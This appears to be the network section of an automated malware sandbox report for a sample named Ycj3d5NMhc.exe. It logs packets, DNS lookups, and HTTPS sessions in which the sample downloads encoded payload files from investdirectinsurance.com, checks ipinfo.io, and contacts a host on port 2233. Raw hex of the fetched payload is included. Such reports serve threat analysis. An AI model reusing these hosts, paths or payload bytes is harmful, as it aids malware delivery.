                          Jul 27, 2024 11:37:20.684988022 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.685008049 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.685012102 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.685035944 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.685065985 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.685087919 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.685112000 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.685177088 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.685911894 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.685957909 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.685992002 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.686009884 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.686032057 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.686055899 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.686769009 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.686813116 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.686850071 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.686862946 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.686891079 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.686911106 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.686912060 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.686948061 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.686966896 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.686990023 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.721645117 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.721750975 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.767940044 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.768075943 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.768081903 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.768141985 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.768177986 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.768193960 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.768198967 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.768225908 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.768256903 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.768279076 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.768310070 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.768376112 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.768752098 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.768791914 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.768835068 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.768857002 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.768879890 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.768906116 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.768948078 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.768970013 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.768991947 CEST44349708104.21.65.79192.168.2.8
                          Jul 27, 2024 11:37:20.769015074 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.769015074 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:20.769052982 CEST49708443192.168.2.8104.21.65.79
                          Jul 27, 2024 11:37:21.233424902 CEST49709443192.168.2.834.117.59.81
                          Jul 27, 2024 11:37:21.233489037 CEST4434970934.117.59.81192.168.2.8
                          Jul 27, 2024 11:37:21.233549118 CEST49709443192.168.2.834.117.59.81
                          Jul 27, 2024 11:37:21.245208979 CEST49709443192.168.2.834.117.59.81
                          Jul 27, 2024 11:37:21.245238066 CEST4434970934.117.59.81192.168.2.8
                          Jul 27, 2024 11:37:21.942378998 CEST4434970934.117.59.81192.168.2.8
                          Jul 27, 2024 11:37:21.942461967 CEST49709443192.168.2.834.117.59.81
                          Jul 27, 2024 11:37:21.945075989 CEST49709443192.168.2.834.117.59.81
                          Jul 27, 2024 11:37:21.945097923 CEST4434970934.117.59.81192.168.2.8
                          Jul 27, 2024 11:37:21.945400953 CEST4434970934.117.59.81192.168.2.8
                          Jul 27, 2024 11:37:21.987025023 CEST49709443192.168.2.834.117.59.81
                          Jul 27, 2024 11:37:22.028505087 CEST4434970934.117.59.81192.168.2.8
                          Jul 27, 2024 11:37:22.141890049 CEST4434970934.117.59.81192.168.2.8
                          Jul 27, 2024 11:37:22.141968012 CEST4434970934.117.59.81192.168.2.8
                          Jul 27, 2024 11:37:22.142066002 CEST49709443192.168.2.834.117.59.81
                          Jul 27, 2024 11:37:22.150693893 CEST49709443192.168.2.834.117.59.81
                          Jul 27, 2024 11:37:22.637271881 CEST497102233192.168.2.879.110.49.176
                          Jul 27, 2024 11:37:22.642498970 CEST22334971079.110.49.176192.168.2.8
                          Jul 27, 2024 11:37:22.644530058 CEST497102233192.168.2.879.110.49.176
                          Jul 27, 2024 11:37:22.650887966 CEST497102233192.168.2.879.110.49.176
                          Jul 27, 2024 11:37:22.657330036 CEST22334971079.110.49.176192.168.2.8
                          Jul 27, 2024 11:37:22.658994913 CEST497102233192.168.2.879.110.49.176
                          Jul 27, 2024 11:37:22.665550947 CEST22334971079.110.49.176192.168.2.8
                          Jul 27, 2024 11:37:24.406416893 CEST497102233192.168.2.879.110.49.176
                          Jul 27, 2024 11:37:24.406941891 CEST497102233192.168.2.879.110.49.176
                          Jul 27, 2024 11:37:24.411361933 CEST22334971079.110.49.176192.168.2.8
                          Jul 27, 2024 11:37:24.412070990 CEST22334971079.110.49.176192.168.2.8
                          Jul 27, 2024 11:37:24.412122965 CEST497102233192.168.2.879.110.49.176
                          Jul 27, 2024 11:37:25.065700054 CEST49673443192.168.2.823.206.229.226
                          Jul 27, 2024 11:37:25.346959114 CEST49672443192.168.2.823.206.229.226
                          Jul 27, 2024 11:37:26.990308046 CEST4434970623.206.229.226192.168.2.8
                          Jul 27, 2024 11:37:26.990521908 CEST49706443192.168.2.823.206.229.226
                          TimestampSource PortDest PortSource IPDest IP
                          Jul 27, 2024 11:37:17.914367914 CEST5629653192.168.2.81.1.1.1
                          Jul 27, 2024 11:37:17.954056025 CEST53562961.1.1.1192.168.2.8
                          Jul 27, 2024 11:37:21.220550060 CEST5419953192.168.2.81.1.1.1
                          Jul 27, 2024 11:37:21.229491949 CEST53541991.1.1.1192.168.2.8
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Jul 27, 2024 11:37:17.914367914 CEST192.168.2.81.1.1.10xbd00Standard query (0)investdirectinsurance.comA (IP address)IN (0x0001)false
                          Jul 27, 2024 11:37:21.220550060 CEST192.168.2.81.1.1.10x14eStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Jul 27, 2024 11:37:17.954056025 CEST1.1.1.1192.168.2.80xbd00No error (0)investdirectinsurance.com104.21.65.79A (IP address)IN (0x0001)false
                          Jul 27, 2024 11:37:17.954056025 CEST1.1.1.1192.168.2.80xbd00No error (0)investdirectinsurance.com172.67.189.102A (IP address)IN (0x0001)false
                          Jul 27, 2024 11:37:21.229491949 CEST1.1.1.1192.168.2.80x14eNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                          Jul 27, 2024 11:37:36.185839891 CEST1.1.1.1192.168.2.80xa671No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                          Jul 27, 2024 11:37:36.185839891 CEST1.1.1.1192.168.2.80xa671No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                          Jul 27, 2024 11:37:36.677989960 CEST1.1.1.1192.168.2.80x1bdeNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          Jul 27, 2024 11:37:36.677989960 CEST1.1.1.1192.168.2.80x1bdeNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                          Jul 27, 2024 11:37:50.052010059 CEST1.1.1.1192.168.2.80x4c4cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                          Jul 27, 2024 11:37:50.052010059 CEST1.1.1.1192.168.2.80x4c4cNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                          • investdirectinsurance.com
                          • ipinfo.io
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.849707104.21.65.794432884C:\Users\user\Desktop\Ycj3d5NMhc.exe
                          TimestampBytes transferredDirectionData
                          2024-07-27 09:37:18 UTC136OUTGET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1
                          User-Agent: Mozilla/5.0
                          Host: investdirectinsurance.com
                          Cache-Control: no-cache
                          2024-07-27 09:37:19 UTC679INHTTP/1.1 200 OK
                          Date: Sat, 27 Jul 2024 09:37:19 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 47616
                          Connection: close
                          etag: "ba00-66a2ddbd-31025;;;"
                          last-modified: Thu, 25 Jul 2024 23:20:29 GMT
                          accept-ranges: bytes
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UnUI4VTuVNpMZdbMtPDGgBunMPP3aFCv3n65%2BVcGh5o7%2F7THW6mXqHC5N2M7eL5UCxEI3UgKKSkknTjFcvgepFitPnDPB4f8rK6Hq3KC%2BAluzTsyCgDCl74qalbw1SM8g6JbTALsEGCLD69y"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8a9ba66cecf62394-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-27 09:37:19 UTC690INData Raw: a6 82 35 e1 29 9d ea cd a8 54 4c 6c 66 73 36 c5 4c 59 de 4c 7e 21 4c ea 2f ee b9 97 4c 2b fc 4c 6c c6 4c ae 23 35 71 39 13 c6 99 4c ea 83 4c 59 ac 9e b9 a2 4c 6c 2d 4c ae b3 4c 59 69 4c 7e 75 4c ea 6b 4c 59 20 4c 2b 58 4f 6e b1 4c ae cb 4c 59 d5 4c 7e 0f 4c ea d7 4c 59 98 4c 2b f6 4c 6c c9 4c ae 24 4c 59 3f 4c 7e 93 4c ea 3c 4c 59 74 4c 2b 8d 4c 6c 27 4c ae 9c 4c 59 63 4c 7e 7b 4c ea 60 4c 59 0e 4c 2b 51 4c 6c 9f 4c ae c0 4c 59 db 4c 7e 04 4c ea d8 4c 59 92 4c 2b f9 4c 6c c3 4c ae 2a 4c 59 34 4c 7e ac 4c ea 36 4c 59 7a 4c 2b 87 4c 6c 29 4d af 96 4c 59 4c 4c 7e 70 4c ea 39 1a fe bf 85 52 a8 cb db 22 3b 78 7e 4c 59 a2 bc 8e b2 31 96 bf e2 06 d7 e3 46 60 1f ff c4 66 a2 52 be 2b e1 04 10 d9 61 84 19 2c 79 63 1c 39 32 77 73 b9 f0 f7 db 0f 1a c5 cf bc 0b aa bc
                          Data Ascii: 5)TLlfs6LYL~!L/L+LlL#5q9LLYLl-LLYiL~uLkLY L+XOnLLYL~LLYL+LlL$LY?L~L<LYtL+Ll'LLYcL~{L`LYL+QLlLLYL~LLYL+LlL*LY4L~L6LYzL+Ll)MLYLL~pL9R";x~LY1F`fR+a,yc92ws
                          2024-07-27 09:37:19 UTC1369INData Raw: 9c 4c 7e 60 4c ea 9e 4c 59 d6 4c 2b 3c 8e ef 84 4c ae 6e 4c 59 42 8f fc d8 4c ea c2 4c 59 3d 4c 2b e3 4c 6c 6c 4c ae f2 4c 59 ea 8f fc 36 4c ea 29 4c 59 61 4c 2b 18 4c 6c f0 4c ae 89 4c 59 96 4c 7e 4e 4c ea 95 4c 59 d9 4c 2b b4 4c 6c 8a 4c ae 69 b1 55 7e 4c 7e d2 4c ea 39 e8 1f 37 4c 2b cc 4c 6c 66 4c ae dd 4c 59 61 0e 3e 39 4c ea 23 4c 59 ae bf 8a 8a b2 b4 de 4c ae 83 4c 59 99 4c 7e 45 4c ea 9b 4c 59 d3 4c 2b ba 4c 6c 81 4c ae 6b 4c 59 75 4c 7e ed 4c ea 77 4c 59 38 4c 2b c6 4c 6c 69 4c ae d7 4c 59 0f 4c 7e 33 4c ea 0c 4c 59 45 4d 2a 2d 4c 6c d5 4c ae cc bc 29 93 4c 7e 4b 4c ea 90 4c 59 ec 4c 2b b1 4c 6c 3f 4c ae 60 4c 59 7b 4c 7e e7 4c ea 78 4c 59 32 4c 2b c9 4c 6c 63 4c ae d8 4c 59 04 4c 7e 1c 4c ea 06 4c 59 4a 4c 2b 27 4c 6c db 4c ae 36 4c 59 ac 4c 7e
                          Data Ascii: L~`LLYL+<LnLYBLLY=L+LllLLY6L)LYaL+LlLLYL~NLLYL+LlLiU~L~L97L+LlfLLYa>9L#LYLLYL~ELLYL+LlLkLYuL~LwLY8L+LliLLYL~3LLYEM*-LlL)L~KLLYL+Ll?L`LY{L~LxLY2L+LlcLLYL~LLYJL+'LlL6LYL~
                          2024-07-27 09:37:19 UTC1369INData Raw: e5 b0 5b c4 c2 3f 4c 2b e0 4c 6c 29 0b d8 54 68 dc 35 e0 66 24 1e fb 37 47 41 63 4c 2b 1a 4c 6c 35 e9 2a 14 c4 c2 59 57 42 71 26 72 38 10 e6 10 91 e5 a7 9c 7d b9 7c 1e 67 4c 59 7d 4c 7e 17 5a 4e 50 c4 c2 40 1a cd 5f 9c 7d e9 c6 12 df 4c 59 23 4c 7e bf 5a 4e f8 c4 c2 d0 d7 c1 41 dd 3c 70 a2 67 11 5e c8 9b 4c 7e 47 4c ea 68 ee b9 5e 63 85 c5 51 84 12 9d bf ec 49 ad 77 4c 7e ef 4c ea 02 49 ad 3d 9a 0d 71 fb 78 53 66 a2 ce c4 c2 6c 6e 1e fc a1 06 6e bc 29 67 3d 0a 53 e3 24 c6 9d bf d2 07 01 90 4c 7e 48 4c ea 56 49 ad 83 65 72 a8 31 77 3c 4c ae 62 4c 59 1e c9 8a 61 ba 2c 41 10 e6 49 d7 c1 5a 9c 7d d8 d3 06 da 4c 59 06 4c 7e ba 5a 4e dd c4 c2 d9 5d 79 12 2b 6b c6 b0 b4 59 42 35 7e df ae 8b f5 20 30 a7 e0 e5 4c 2b 9c 4c 6c 96 7c 1e a7 10 e6 21 df ae 3f 09 9c e1
                          Data Ascii: [?L+Ll)Th5f$7GAcL+Ll5*YWBq&r8}|gLY}L~ZNP@_}LY#L~ZNA<pg^L~GLh^cQIwL~LI=qxSflnn)g=S$L~HLVIer1w<LbLYa,AIZ}LYL~ZN]y+kYB5~ 0L+Ll|!?
                          2024-07-27 09:37:19 UTC1369INData Raw: 41 c0 6f d9 a7 42 97 c8 92 47 88 4c 59 97 4c 7e eb 5a 4e d0 eb 1d d5 b7 22 b5 4c 6c 4f e9 2a 61 a9 5c 7f 4c 7e d3 4c ea 52 c4 c2 b7 8e e8 f1 b2 b4 67 4c ae b5 92 26 20 4c 7e 38 4c ea 22 4c 59 72 e4 f1 13 4c 6c df 4c ae 0d 10 e6 98 4c 7e 50 6b 7e e5 74 32 70 bd 88 81 67 e2 a4 59 8a 07 74 32 6b 87 d1 57 a0 07 13 99 3e cd 6b bd 84 0e 2c 5c 59 8a af 74 32 fb 78 e9 ff a0 07 43 74 32 87 cc a9 78 5a 08 96 0e ec a9 3a 4d e9 50 84 b4 04 d1 1e 11 e7 a0 85 52 62 5f bf ea 1b c8 23 0c 19 1d c9 8a ef 76 e3 79 4c 59 b7 1a cd 7d 0a 59 62 4c ae d9 4c 59 05 4c 7e 23 a6 f0 86 8c 98 7b 6f d9 26 4c 6c e3 b7 b3 37 4c 59 ad 4c 7e 41 4c ea 43 47 41 e7 4c 2b 9e 4c 6c 0b a5 60 4f 4c 59 c5 9b 5a f5 26 72 1a 74 32 6d ac 58 d2 5d bc a6 a4 61 f7 3a 4d 17 e0 66 6c 47 90 41 f3 14 50 df
                          Data Ascii: AoBGLYL~ZN"LlO*a\L~LRgL& L~8L"LYrLlLL~Pk~t2pgYt2kW>k,\Yt2xCt2xZ:MPRb_#vyLY}YbLLYL~#{o&Ll7LYL~ALCGAL+Ll`OLYZ&rt2mX]a:MflGAP
                          2024-07-27 09:37:19 UTC1369INData Raw: b7 4c 6c 58 dc fc 66 4c 59 7c 4c 7e 5e a1 06 7e 4c 59 83 9a 0d 88 4b 18 c4 7c 1e 15 30 95 f1 9e ef ee ca 1e 21 4c 59 4d 4c 2b 94 a9 a8 b2 20 e4 14 da 7c d9 0d 3c 46 4c ea 99 4c 59 23 6f d9 4c 1a 48 9a 73 36 c9 ee b9 0d 41 96 79 eb fc 75 4c 59 94 47 d2 df b0 b6 6a 4c ae d5 4c 59 a9 2a ba 37 da cc f9 db 7d 6b a3 07 5e 2c 0c 85 dc fc 8e fd 68 d9 30 36 98 1e fb df 91 25 ef 4c 2b b2 4c 6c 49 e9 2a f8 84 82 67 63 e4 e5 4c ea 7b 4c 59 54 38 6d bf c8 d9 44 48 9b db 4c 59 07 4c 7e 20 a6 f0 85 8c 98 78 6f d9 25 4c 6c e0 b7 b3 34 4c 59 af 4c 7e 43 4c ea 40 47 41 e4 4c 2b 9d 4c 6c 08 a5 60 4c 4c 59 c7 9b 5a f7 26 72 19 74 32 2e ec 1b d1 5d bc a5 a4 61 f4 3a 4d 14 e0 66 6e 47 90 02 b1 55 52 df f9 d2 67 e2 86 fb fb ce 78 0d e4 0e 3e 68 6b 7e be 47 41 87 85 52 b3 29 68
                          Data Ascii: LlXfLY|L~^~LYK|0!LYML+ |<FLLY#oLHs6AyuLYGjLLY*7}k^,h06%L+LlI*gcL{LYT8mDHLYL~ xo%Ll4LYL~CL@GAL+Ll`LLYZ&rt2.]a:MfnGURgx>hk~GAR)h
                          2024-07-27 09:37:19 UTC1369INData Raw: 6b a8 0f 9e 49 ec 75 f1 57 47 90 e3 ce da 18 6b bd 52 0e 2c 09 59 8a 9b 47 41 e7 50 84 6f 97 c0 4b 9e 49 5d 62 84 d5 c2 17 93 5e 3c 1c 78 0d 37 0e 3e ab 7b ae 7e 54 50 38 4c 2b 21 a9 a8 4c 48 9b d7 4c 59 0f 4c 7e 33 4c ea f0 c4 c2 c5 8e e8 99 a9 a8 d5 4c ae 15 00 74 93 4c 7e 4b 4c ea 90 4c 59 26 91 e5 b1 4c 6c 3f 4c ae ae 10 e6 7b 4c 7e d0 da cc 1e eb 1d 27 0a 1e 88 0d 2f 63 4c ae d8 4c 59 34 3d 4e 88 6b 7e 1e 47 41 dd 4b 5e 37 5d bc ca 9d bf 15 2f 7a ac 4c 7e 40 4c ea ea eb 1d 05 6f d9 8e 9c 7d be e0 24 4e 4c 59 70 4c 7e 8e 7b ae 63 5e c8 bf fe ca c3 4c 6c 4c 4c ae a5 eb 1d 3d 4a 48 01 eb fc 09 4c 59 7b 47 d2 37 b0 b6 d0 4c ae 39 4c 59 52 2a ba 01 36 a2 ac 54 50 e9 4c 2b 7c 51 84 1f 48 9b 91 bb cd 5e 4c 7e d6 6b 7e 49 bb cd 17 4c 2b e8 1a 48 fd 02 d7 dc
                          Data Ascii: kIuWGkR,YGAPoKI]b^<x7>{~TP8L+!LHLYL~3LLtL~KLLY&Ll?L{L~'/cLLY4=Nk~GAK^7]/zL~@Lo}$NLYpL~{c^LlLL=JHLY{G7L9LYR*6TPL+|QH^L~k~IL+H
                          2024-07-27 09:37:19 UTC1369INData Raw: 59 9b 4c 7e 77 6d 5a 89 5e c8 26 ba ed b9 4c 6c 83 4c ae ec 49 ad 76 4d 7f b4 80 36 74 4c 59 3a 4c 2b f5 7e 9c be b8 bb 4a e1 05 0c 4c 7e 30 4c ea 3e ee b9 97 1f 3a b4 16 83 d7 4c ae 3e 4c 59 54 2a ba 49 4d eb 05 1a fe ee 4c 2b b3 4c 6c 9c 7c 1e b3 5e c8 f4 f2 b6 e4 4c ea 7a 4c 59 b5 1a cd ca 4d 6d 8a 80 54 da 4c 59 06 4c 7e ae 6d 5a f3 da 7c 37 05 91 24 4c 6c d8 4c ae 95 ee b9 3f 9e ef ed 40 b4 ad 4c 59 e5 4c 2b 78 a9 a8 37 4d af 8f ce da 72 4c 7e ea 4c ea d1 ee b9 0e 1f 3a 22 ef 8c 4e 4c ae d1 4c 59 8d 2a ba 14 4d eb e3 10 e6 43 4c 2b 2a 4c 6c 21 7c 1e 2e da 7c 1b 74 f0 bd 4c ea a7 4c 59 08 6f d9 87 9c 7d 63 d5 00 47 4c 59 5d 4c 7e 27 5a 4e 5e 4d 58 02 a9 3d 7e 4c 6c 45 4c ae 0c ee b9 d0 9e ef 43 42 b6 00 4c 59 bc 4c 2b a5 a9 a8 ec 4d af 2a c4 c2 ab 4c
                          Data Ascii: YL~wmZ^&LlLIvM6tLY:L+~JL~0L>:L>LYT*IML+Ll|^LzLYMmTLYL~mZ|7$LlL?@LYL+x7MrL~L:"NLLY*MCL+*Ll!|.|tLLYo}cGLY]L~'ZN^MX=~LlELCBLYL+M*L
                          2024-07-27 09:37:19 UTC1369INData Raw: 92 36 a2 c1 cb 6e c9 7e 49 e0 2b 6b 32 15 c0 f1 cb 6e f2 63 e4 92 6d 5a 20 54 50 76 6c db 2c 4c 6c 86 dc fc a3 25 62 42 5e 6e 0b 0e a8 a9 35 71 ed 4c 2b b0 4c 6c 3e 4c ae 0b 76 31 89 6e 1e 89 31 96 fd 49 ad 63 5d 79 63 67 e2 72 5c 3e 98 0f 1a fe 13 c6 1d 4c ea 07 4c 59 4b 4c 2b 4e c0 14 41 15 c0 43 49 ad 7d df ae dd 31 96 3e 5e c8 a6 0e 6a 9e 4c 6c 35 4c ae eb 49 ad 71 4c 7e 2f 5a 4e f7 49 ad 4c 5d 79 4c 67 e2 e9 e9 2a 8c 42 35 e2 75 f1 87 de 7a 4a 0f 1a b8 c6 13 29 4c 6c d1 4c ae 38 4c 59 cf 53 86 85 a0 07 3e c4 c2 22 91 e5 7d 51 84 00 a5 60 74 ee b9 e3 e0 66 6c a1 06 ec ee b9 fb 62 84 47 66 e3 cb c6 12 96 91 25 e6 1b db bb fc 49 02 4c 59 85 63 85 83 7e 9c f0 50 84 a2 9e 49 36 63 e4 54 6d 5a 11 10 e6 01 6f d9 47 b2 b4 e5 3a 79 b1 02 76 60 7a ea fc 6d 5a
                          Data Ascii: 6n~I+k2ncmZ TPvl,Ll%bB^n5qL+Ll>Lv1n1Ic]ycgr\>LLYKL+NACI}1>^jLl5LIqL~/ZNIL]yLg*B5uzJ)LlL8LYS>"}Q`tflbGf%ILYc~PI6cTmZoG:yv`zmZ
                          2024-07-27 09:37:19 UTC1369INData Raw: 4c 59 47 4c 2b 6a 4b 18 cd b0 b4 9f ee b9 cd a6 a2 f7 47 90 9d d3 67 04 71 d5 87 d9 c9 13 b0 b4 cf 30 95 43 74 f0 07 6d 5a 16 74 32 3f a0 04 f2 f5 b0 94 98 4b c4 c4 c2 a3 2a ba 43 17 42 94 1f 89 a2 63 85 a9 05 90 2c cb 18 e0 78 0d 14 74 f0 c7 5a 4e ec 0c 19 71 aa 3e 7e ed 8e 37 4c ae dc 1f 89 c8 82 54 fb de 7a 82 bc 29 4e 5d 79 07 a9 a8 bb b9 ba 22 ee b9 d4 63 e4 bc 17 42 e2 10 e6 ea d7 c1 32 d6 41 e8 40 94 46 e4 a1 3e 63 e4 ec 5c ba af 54 50 ea 4c 2b 38 66 e3 68 dc fc 43 a9 5c 89 d8 18 d4 6b 7e 8b 7b 0e 81 29 fd 6e 9c 7d b9 b7 b3 ee 4c 59 02 4c 7e 6e 7b ae 01 4c 59 b8 78 2e b4 b8 38 ec 4c ae 31 4c 59 7e 39 aa d1 09 9c f0 e0 04 a0 0e 6a 98 4c 6c 32 4c ae 61 d1 65 9b 16 00 4f cf 28 8c 05 02 1b 4c 2b 74 4c 6c 7a 7c 1e 74 5e c8 fb 88 cb 11 4c ea fd 4c 59 f3
                          Data Ascii: LYGL+jKGgq0CtmZt2?K*CBc,xtZNq>~7LTz)N]y"cB2A@F>c\TPL+8fhC\k~{)n}LYL~n{LYx.8L1LY~9jLl2LaeO(L+tLlz|t^LLY
                          2024-07-27 09:37:19 UTC1369INData Raw: 52 31 8c ec b0 c0 14 51 fd 68 7b 4c 7e e7 4c ea 1e eb 1d 17 78 2e 1f b8 38 b6 b8 bb db 4e 5b 04 4c 7e 1c 4c ea 36 ee b9 9f 0a 1e 0d 83 56 db 4c ae 36 4c 59 4c 3d 4e 01 0e a8 18 08 ef fe e4 f1 9f 4c 6c 34 4c ae 03 74 32 d3 3e 4d 05 c4 50 c3 fd 68 1d 4c 2b c3 4c 6c 0a 0b d8 e7 a9 5c 9e 39 aa 23 4b df 0a 4e 5b 41 4c 2b 28 4c 6c 22 7c 1e 2c da 7c 8c 11 c5 be 4c ea a5 4c 59 0b 6f d9 d6 0d 2f ea 1e 7c 5d 47 41 5e 4c 7e e2 4c ea 10 74 32 a2 cb dc f2 42 97 67 6d 8f ed 4c 59 01 4c 7e 6d 7b ae f4 a9 5c db 48 5d f5 fa 79 ec 4f ad 33 4c 59 a9 4c 7e 55 6d 5a 3e da 7c c9 c5 10 9a 4c 6c 31 4c ae 7b ee b9 14 0d 3c 98 28 3c f3 49 ad 18 4c 2b 76 4c 6c f7 02 d7 01 5b bc 30 91 44 32 3f cb ff 4c 59 b4 4c 2b 49 4b 18 e0 48 9b 08 bb cd 36 7b eb b9 4e e9 a0 4c 59 cc 4c 2b 61 7e
                          Data Ascii: R1Qh{L~Lx.8N[L~L6VL6LYL=NLl4Lt2>MPhL+Ll\9#KN[AL+(Ll"|,|LLYo/|]GA^L~Lt2BgmLYL~m{\H]yO3LYL~UmZ>|Ll1L{<(<IL+vLl[0D2?LYL+IKH6{NLYL+a~


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.849708104.21.65.794432884C:\Users\user\Desktop\Ycj3d5NMhc.exe
                          TimestampBytes transferredDirectionData
                          2024-07-27 09:37:19 UTC130OUTGET /assuence/litesolidCha/Zopi.bd HTTP/1.1
                          User-Agent: Mozilla/5.0
                          Host: investdirectinsurance.com
                          Cache-Control: no-cache
                          2024-07-27 09:37:20 UTC689INHTTP/1.1 200 OK
                          Date: Sat, 27 Jul 2024 09:37:20 GMT
                          Content-Type: application/octet-stream
                          Content-Length: 549888
                          Connection: close
                          etag: "86400-66a2ebab-3103e;;;"
                          last-modified: Fri, 26 Jul 2024 00:19:55 GMT
                          accept-ranges: bytes
                          CF-Cache-Status: DYNAMIC
                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4UV350ktCDJHgX2zA08VGIEBzuzw3BLL%2BQcou0PZfojCKlQyRfFjBO%2BrjkQzMo46SBPwOfzYey%2B30Jj4QfU3MZ2%2FkeSbGPK%2FZt3jQ7CSBFoZJ%2FTgJydExFLPpz%2FId6ljSodAT5zK8BElRB91"}],"group":"cf-nel","max_age":604800}
                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                          Server: cloudflare
                          CF-RAY: 8a9ba67358e10f7f-EWR
                          alt-svc: h3=":443"; ma=86400
                          2024-07-27 09:37:20 UTC680INData Raw: a6 82 35 e1 29 9d ea cd a8 54 4c 6c 66 73 36 c5 4c 59 de 4c 7e 21 4c ea 2f ee b9 97 4c 2b fc 4c 6c c6 4c ae 23 35 71 39 13 c6 99 4c ea 83 4c 59 ac 9e b9 a2 4c 6c 2d 4c ae b3 4c 59 69 4c 7e 75 4c ea 6b 4c 59 20 4c 2b 58 4f 6e b1 4c ae cb 4c 59 d5 4c 7e 0f 4c ea d7 4c 59 98 4c 2b f6 4c 6c c9 4c ae 24 4c 59 3f 4c 7e 93 4c ea 3c 4c 59 74 4c 2b 8d 4c 6c 27 4c ae 9c 4c 59 63 4c 7e 7b 4c ea 60 4c 59 0e 4c 2b 51 4c 6c 9f 4c ae c0 4c 59 db 4c 7e 04 4c ea d8 4c 59 92 4c 2b f9 4c 6c c3 4c ae 2a 4c 59 34 4c 7e ac 4c ea 36 4c 59 7a 4c 2b 87 4c 6c 29 4d af 96 4c 59 4c 4c 7e 70 4c ea 39 1a fe bf 85 52 a8 cb db 22 3b 78 7e 4c 59 a2 bc 8e b2 31 96 bf e2 06 d7 e3 46 60 1f ff c4 66 a2 52 be 2b e1 04 10 d9 61 84 19 2c 79 63 1c 39 32 77 73 b9 f0 f7 db 0f 1a c5 cf bc 0b aa bc
